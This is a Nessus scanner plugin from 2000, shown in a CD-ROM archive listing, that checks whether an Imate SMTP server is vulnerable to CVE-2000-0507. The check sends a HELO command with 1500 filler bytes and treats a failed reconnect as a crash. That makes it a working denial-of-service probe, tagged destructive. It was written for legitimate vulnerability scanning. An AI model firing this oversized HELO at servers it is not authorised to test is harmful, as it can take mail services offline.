home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / imate_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  89 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10435);
  10.  script_bugtraq_id(1286);
  11.  script_version ("$Revision: 1.15 $");
  12.  script_cve_id("CVE-2000-0507");
  13.  name["english"] = "Imate HELO overflow";
  14.  name["francais"] = "DΘpassement de HELO dans Imate";
  15.  script_name(english:name["english"],
  16.           francais:name["francais"]);
  17.  
  18.  desc["english"] = "
  19. The remote SMTP server crashes when it is
  20. issued a HELO command with an argument longer
  21. than 1200 chars.
  22.  
  23. This problem may allow an attacker to shut down
  24. your SMTP server.
  25.  
  26. Solution : Upgrade the SMTP server software
  27. Risk factor : High";
  28.  
  29.  
  30.  desc["francais"] = "
  31. Le serveur SMTP distant se plante lorsqu'on lui
  32. envoye une commande HELO ayant un argument
  33. de plus de 1200 octets.
  34.  
  35. Ce problΦme peut permettre α des pirates d'Θteindre
  36. votre serveur SMTP
  37.  
  38. Solution : mettez-le α jour
  39. Facteur de risque : SΘrieux";
  40.  
  41.  
  42.  script_description(english:desc["english"],
  43.               francais:desc["francais"]);
  44.             
  45.  
  46.  summary["english"] = "Checks if the remote mail server can be oveflown"; 
  47.  summary["francais"] = "VΘrifie si le serveur de mail est sujet α un overflow";
  48.  script_summary(english:summary["english"],
  49.           francais:summary["francais"]);
  50.  
  51.  script_category(ACT_DESTRUCTIVE_ATTACK);
  52.  
  53.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  54.            francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  55.  
  56.  family["english"] = "SMTP problems";
  57.  family["francais"] = "ProblΦmes SMTP";
  58.  script_family(english:family["english"], francais:family["francais"]);
  59.  script_dependencie("find_service.nes", "sendmail_expn.nasl");
  60.  script_exclude_keys("SMTP/wrapped");
  61.  script_require_ports("Services/smtp", 25);
  62.  exit(0);
  63. }
  64.  
  65. #
  66. # The script code starts here
  67. #
  68.  
  69. include("smtp_func.inc");
  70.  
  71. port = get_kb_item("Services/smtp");
  72. if(!port)port = 25;
  73. if(get_port_state(port))
  74. {
  75.  soc = open_sock_tcp(port);
  76.  if(soc)
  77.  {
  78.  data = smtp_recv_banner(socket:soc);
  79.  crp = string("HELO ", crap(1500), "\r\n");
  80.  send(socket:soc, data:crp);
  81.  data = recv_line(socket:soc, length:4);
  82.  close(soc);
  83.  
  84.  
  85.  soc2 = open_sock_tcp(port);
  86.  if(!soc2)security_hole(port);
  87.  }
  88. }
  89.